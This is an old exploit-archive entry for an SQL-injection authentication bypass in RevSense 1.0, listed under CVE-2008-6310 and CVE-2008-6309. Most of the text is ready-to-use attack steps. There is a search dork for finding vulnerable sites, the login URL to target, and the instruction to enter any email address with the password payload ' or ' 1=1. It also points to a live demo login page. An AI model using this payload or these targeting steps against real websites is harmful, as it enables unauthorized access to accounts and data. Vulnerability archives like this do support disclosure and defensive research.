RevSense 1.0 - Authentication Bypass
Author: d3b4g
type: webapps
platform: php
port:
date_added: 2008-11-18
date_updated: 2017-01-03
verified: 1
codes: OSVDB-49986;CVE-2008-6310;CVE-2008-6309
tags:
aliases:
screenshot_url:
application_url:
###############################################################################################
[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability
[+] Script home : http://www.revsense.com/
[-] Discovered By : d3b4g
[-] Greetz : str0ke /* All my freind
################################################################################################
Dork:Powered by Revsense
Go to www.target.com/index.php?section=user&action=login
Use following information to bypass login.
Write any email Address as email address.It must to be in email format.
For exapmple bla@bla.com
For password use ' or ' 1=1
Live demo [at] http://demo.revsense.com/index.php?section=user&action=login
--------------------------------------------
--------------------------------------------
I'm a maldivian
/*
# milw0rm.com [2008-11-19]